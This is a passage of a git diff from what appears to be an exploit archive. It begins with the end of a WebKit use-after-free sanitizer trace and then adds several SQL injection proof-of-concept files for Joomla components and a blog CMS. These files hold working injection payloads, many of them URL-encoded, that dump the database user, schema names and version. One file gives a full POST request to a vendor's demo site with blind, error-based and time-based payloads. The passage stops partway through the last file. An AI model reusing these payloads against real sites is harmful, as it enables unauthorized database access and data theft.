+    #23 0x12328d3a8 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1123a8)
+    #24 0x12328d3a8 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1123a8)
+    #25 0x1232869da in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b9da)
+    #26 0x124ff1344 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e76344)
+    #27 0x1255c2169 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2447169)
+    #28 0x1255c22fb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x24472fb)
+    #29 0x1255c26a1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x24476a1)
+
+previously allocated by thread T0 here:
+    #0 0x10c4dfa3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
+    #1 0x7fff7cdbb1bc in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x21bc)
+    #2 0x12326a124 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xef124)
+    #3 0x12327de7c in bmalloc::IsoTLS::debugMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x102e7c)
+    #4 0x11899e1b9 in void* bmalloc::IsoTLS::allocateSlow<bmalloc::IsoConfig<272u>, WebCore::RenderBlockFlow>(bmalloc::api::IsoHeap<WebCore::RenderBlockFlow>&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36721b9)
+    #5 0x118940c7d in std::__1::unique_ptr<WebCore::RenderBlockFlow, WebCore::RenderObjectDeleter> WebCore::createRenderer<WebCore::RenderBlockFlow, WebCore::Document&, WebCore::RenderStyle>(WebCore::Document&&&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3614c7d)
+    #6 0x118940a2c in WebCore::RenderBlock::createAnonymousBlockWithStyleAndDisplay(WebCore::Document&, WebCore::RenderStyle const&, WebCore::DisplayType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3614a2c)
+    #7 0x118920347 in WebCore::RenderBlock::createAnonymousBlock(WebCore::DisplayType) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35f4347)
+    #8 0x118ea9339 in WebCore::RenderTreeBuilder::Block::attachIgnoringContinuation(WebCore::RenderBlock&, std::__1::unique_ptr<WebCore::RenderObject, WebCore::RenderObjectDeleter>, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b7d339)
+    #9 0x118ea7be3 in WebCore::RenderTreeBuilder::Block::attach(WebCore::RenderBlock&, std::__1::unique_ptr<WebCore::RenderObject, WebCore::RenderObjectDeleter>, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b7bbe3)
+    #10 0x118ea7989 in WebCore::RenderTreeBuilder::BlockFlow::attach(WebCore::RenderBlockFlow&, std::__1::unique_ptr<WebCore::RenderObject, WebCore::RenderObjectDeleter>, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b7b989)
+    #11 0x118ea6699 in WebCore::RenderTreeBuilder::attach(WebCore::RenderElement&, std::__1::unique_ptr<WebCore::RenderObject, WebCore::RenderObjectDeleter>, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b7a699)
+    #12 0x118eab63f in WebCore::RenderTreeBuilder::move(WebCore::RenderBoxModelObject&, WebCore::RenderBoxModelObject&, WebCore::RenderObject&, WebCore::RenderObject*, WebCore::RenderTreeBuilder::NormalizeAfterInsertion) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b7f63f)
+    #13 0x118eabb16 in WebCore::RenderTreeBuilder::moveChildren(WebCore::RenderBoxModelObject&, WebCore::RenderBoxModelObject&, WebCore::RenderObject*, WebCore::RenderObject*, WebCore::RenderObject*, WebCore::RenderTreeBuilder::NormalizeAfterInsertion) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b7fb16)
+    #14 0x118eab8ef in WebCore::RenderTreeBuilder::moveAllChildren(WebCore::RenderBoxModelObject&, WebCore::RenderBoxModelObject&, WebCore::RenderObject*, WebCore::RenderTreeBuilder::NormalizeAfterInsertion) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b7f8ef)
+    #15 0x118eb7221 in WebCore::RenderTreeBuilder::MultiColumn::destroyFragmentedFlow(WebCore::RenderBlockFlow&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b8b221)
+    #16 0x118ec220f in WebCore::RenderTreeUpdater::updateAfterDescendants(WebCore::Element&, WebCore::Style::ElementUpdates const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b9620f)
+    #17 0x118ec2197 in WebCore::RenderTreeUpdater::popParent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b96197)
+    #18 0x118ec1357 in WebCore::RenderTreeUpdater::popParentsToDepth(unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b95357)
+    #19 0x118ec0f21 in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b94f21)
+    #20 0x118ec070a in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b9470a)
+    #21 0x117778cdd in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244ccdd)
+    #22 0x11777a351 in WebCore::Document::updateStyleIfNeeded() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244e351)
+    #23 0x117796e85 in WebCore::command(WebCore::Document*, WTF::String const&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x246ae85)
+    #24 0x117796c2f in WebCore::Document::execCommand(WTF::String const&, bool, WTF::String const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x246ac2f)
+    #25 0x115b79f52 in WebCore::jsDocumentPrototypeFunctionExecCommandBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x84df52)
+    #26 0x115b56f77 in long long WebCore::IDLOperation<WebCore::JSDocument>::call<&(WebCore::jsDocumentPrototypeFunctionExecCommandBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82af77)
+    #27 0x11b7c8c5176  (<unknown module>)
+    #28 0x12328d3a8 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1123a8)
+    #29 0x12328d3a8 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1123a8)
+
+SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb9c48) in WebCore::RenderObject::RenderObjectBitfields::isBox() const
+Shadow bytes around the buggy address:
+  0x1c240000e830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1c240000e840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1c240000e850: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x1c240000e860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1c240000e870: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa
+=>0x1c240000e880: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd
+  0x1c240000e890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c240000e8a0: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
+  0x1c240000e8b0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+  0x1c240000e8c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c240000e8d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==24960==ABORTING
+
+
+WebKit tracker link: https://bugs.webkit.org/show_bug.cgi?id=186655
+Apple product security report ID: 693278931
+-->
\ No newline at end of file
diff --git a/exploits/php/webapps/45438.txt b/exploits/php/webapps/45438.txt
index 261493c82..54d6dee49 100644
--- a/exploits/php/webapps/45438.txt
+++ b/exploits/php/webapps/45438.txt
@@ -2,7 +2,7 @@
 # Author: Manuel Garcia Cardenas
 # Date: 2018-09-19
 # Software link: https://es.wordpress.org/plugins/wechat-broadcast/
-# CVE: N/A
+# CVE: CVE-2018-16283
 
 # Description
 # This bug was found in the file: /wechat-broadcast/wechat/Image.php
diff --git a/exploits/php/webapps/45439.txt b/exploits/php/webapps/45439.txt
index c3f7bef04..bc43b9745 100644
--- a/exploits/php/webapps/45439.txt
+++ b/exploits/php/webapps/45439.txt
@@ -2,7 +2,7 @@
 # Author: Manuel Garcia Cardenas
 # Date: 2018-09-19
 # Software link: https://es.wordpress.org/plugins/localize-my-post/
-# CVE: N/A
+# CVE: 2018-16299
 
 # DESCRIPTION
 # This bug was found in the file: /localize-my-post/ajax/include.php
diff --git a/exploits/php/webapps/45462.txt b/exploits/php/webapps/45462.txt
new file mode 100644
index 000000000..ed444a6cb
--- /dev/null
+++ b/exploits/php/webapps/45462.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Joomla! Component Dutch Auction Factory 2.0.2 - 'filter_order_Dir' SQL Injection
+# Dork: N/A
+# Exploit Author: Ihsan Sencan
+# Date: 2018-09-24
+# Vendor Homepage: https://thephpfactory.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/dutch-auction-factory/
+# Version: 2.0.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) http://localhost/[PATH]/index.php?option=com_dutchfactory&task=showSearchResults&filter_order_Dir=[SQL]&filter_order=[SQL]
+ 
+%2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
\ No newline at end of file
diff --git a/exploits/php/webapps/45463.txt b/exploits/php/webapps/45463.txt
new file mode 100644
index 000000000..7721e01fe
--- /dev/null
+++ b/exploits/php/webapps/45463.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Super Cms Blog Pro 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2018-09-24
+# Vendor Homepage: http://coolscript.cf/
+# Software Link: https://www.codegrape.com/item/super-cms-blog-pro/22250
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-17391
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/authors_post.php?author=[SQL]&p_id=1
+# 
+# '++/*!11111UNION*/+/*!11111SELECT*/+0x31,0x32,/*!11111CONCAT_WS*/(0x203a20,VERSION()),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131--+-
+#  
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/45464.txt b/exploits/php/webapps/45464.txt
new file mode 100644
index 000000000..5c8790e6f
--- /dev/null
+++ b/exploits/php/webapps/45464.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Joomla! Component Raffle Factory 3.5.2 - SQL Injection
+# Dork: N/A
+# Date: 2018-09-24
+# Vendor Homepage: https://thephpfactory.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/raffle-factory/
+# Version: 3.5.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-17379
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?task=showSearchResults&option=com_rafflefactory&filter_order_Dir=[SQL]&filter_order=[SQL]
+# 
+# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
+#  
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/45465.txt b/exploits/php/webapps/45465.txt
new file mode 100644
index 000000000..9183fbb9f
--- /dev/null
+++ b/exploits/php/webapps/45465.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Joomla! Component Music Collection 3.0.3 - SQL Injection
+# Dork: N/A
+# Date: 2018-09-24
+# Vendor Homepage: http://joomlathat.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/music-collection/
+# Version: 3.0.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-17375
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php/music-collection/playlist-0-on-the-go?task=edit_playlist&id=[SQL]
+# 
+# 0%20%4f%52%20%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
+#  
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/45466.txt b/exploits/php/webapps/45466.txt
new file mode 100644
index 000000000..b20af8133
--- /dev/null
+++ b/exploits/php/webapps/45466.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Joomla! Component Penny Auction Factory 2.0.4 - SQL Injection
+# Dork: N/A
+# Date: 2018-09-24
+# Vendor Homepage: https://thephpfactory.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/penny-auction-factory/
+# Version: 2.0.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-17378
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_pennyfactory&task=showSearchResults&filter_order_Dir[SQL]&filter_order=[SQL]
+# 
+# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
+#  
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/45468.txt b/exploits/php/webapps/45468.txt
new file mode 100644
index 000000000..8a06f2d97
--- /dev/null
+++ b/exploits/php/webapps/45468.txt
@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: Joomla! Component Questions 1.4.3 - SQL Injection
+# Dork: N/A
+# Date: 2018-09-24
+# Vendor Homepage: https://extensiondeveloper.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/communication/question-a-answers/questions/
+# Version: 1.4.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-17377
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_questions&tmpl=component&task=quazax.getusers&term=[SQL]
+# 
+# 66' UNION ALL SELECT NULL,NULL,CONCAT((SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x))--+-
+# 
+# 66' UNION ALL SELECT NULL,NULL,CONCAT(replace(replace(replace(0x232425,0x23,@:=replace(replace(replace(replace(0x243c62723e253c62723e,0x24,0x3c62723e3c62723e20494853414e2053454e43414e203c666f6e7420636f6c6f723d7265643e),0x25,version()),0x26,database()),0x27,user())),0x24,(select+count(*)+from+information_schema.columns+where+table_schema=database()+and@:=replace(replace(0x003c62723e2a,0x00,@),0x2a,table_name))),0x25,@))--+-
+# 
+# 66' AND (SELECT 8948 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(8948=8948,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Efe
+# 
+# 2)
+# http://localhost/[PATH]/index.php?option=com_questions&tmpl=component&task=quazax.sendnotification&userid=[SQL]&users=[SQL]&groups=[SQL]
+# 
+# 
+# 66 OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),(SELECT (ELT(1=1,1))),0x7e7e496873616e53656e63616e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+# 
+# 3)
+# http://localhost/[PATH]/index.php?option=com_questions&tmpl=component&task=quazax.addnewgroup&group_name=[SQL]
+# 
+# %27%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%34%39%36%38%37%33%36%31%36%65%32%30%35%33%36%35%36%65%36%33%36%31%36%65%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d
+# 
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/45469.txt b/exploits/php/webapps/45469.txt
new file mode 100644
index 000000000..8ffbeb3ce
--- /dev/null
+++ b/exploits/php/webapps/45469.txt
@@ -0,0 +1,23 @@
+# # # # #
+# Exploit Title: Joomla! Component Jobs Factory 2.0.4 - SQL Injection
+# Dork: N/A
+# Date: 2018-09-24
+# Vendor Homepage: https://thephpfactory.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/jobs-factory/
+# Version: 2.0.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-17382
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jobsfactory&task=categories&filter_letter=[SQL]
+# 
+# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
+#  
+# %27%20%4f%52%20%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%56%65%72%41%79%61%72%69
+#  
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/45470.txt b/exploits/php/webapps/45470.txt
new file mode 100644
index 000000000..4760a4d11
--- /dev/null
+++ b/exploits/php/webapps/45470.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Joomla! Component Social Factory 3.8.3 - SQL Injection
+# Dork: N/A
+# Date: 2018-09-24
+# Vendor Homepage: https://thephpfactory.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/social-factory/
+# Version: 3.8.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-17385
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/socialfactory-events/socialfactory-events-radius-search?option=com_socialfactory&view=page&task=page.display&radius[lat]=[SQL]&radius[lng]=[SQL]&radius[radius]=[SQL]
+# 
+# %20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
+#  
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/45472.txt b/exploits/php/webapps/45472.txt
new file mode 100644
index 000000000..ebe461178
--- /dev/null
+++ b/exploits/php/webapps/45472.txt
@@ -0,0 +1,77 @@
+# Exploit Title: Joomla Component eXtroForms 2.1.5 - 'filter_type_id' SQL Injection
+# Dork: N/A
+# Date: 2018-08-03
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://extro.media/
+# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/extroforms/
+# Version: 2.1.5
+# Category: Webapps
+# Tested on: Kali linux
+# Description : An attacker can execute SQL commands through parameters that contain vulnerable.
+# An authorized user can use the filtering feature and can fully authorize the database or other server informations.
+
+# "filter_type_id, filter_pid_id, filter_search" parameters have the same vulnerable.
+# Demo: https://demo.extro.media/responsive-joomla-extensions-en/extroforms-demos-en/
+# PoC : SQLi :
+
+POST /administrator/index.php?option=com_extroform&view=extroformfield
+Host: demo.extro.media
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://demo.extro.media/administrator/index.php?option=com_extroform&view=extroformfield
+Cookie: 2e7fc5dc4e4ce76c3319e1db921484ac=eqgcirsi6m53s6vbi7bbgng1n5; 48bd4f2f65b6c84d32f8704444f9b24c=rt2t3ur8fgmbjemdqua1vn8u35
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 146
+filter_type_id=1&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&cc73497ba686a8903b677f55cb29b616=1
+
+# Parameter: filter_type_id (POST)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+
+Payload: filter_type_id=-7022 OR 5787=5787#&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&cc73497ba686a8903b677f55cb29b616=1
+
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+
+Payload: filter_type_id=1 AND (SELECT 5756 FROM(SELECT COUNT(*),CONCAT(0x7162706271,(SELECT (ELT(5756=5756,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&cc73497ba686a8903b677f55cb29b616=1
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+
+Payload: filter_type_id=1 AND SLEEP(5)&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&cc73497ba686a8903b677f55cb29b616=1
+
+# Parameter: filter_pid_id (POST)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+
+Payload: filter_type_id=1&filter_pid_id=-5547 OR 1857=1857#&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
+
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+
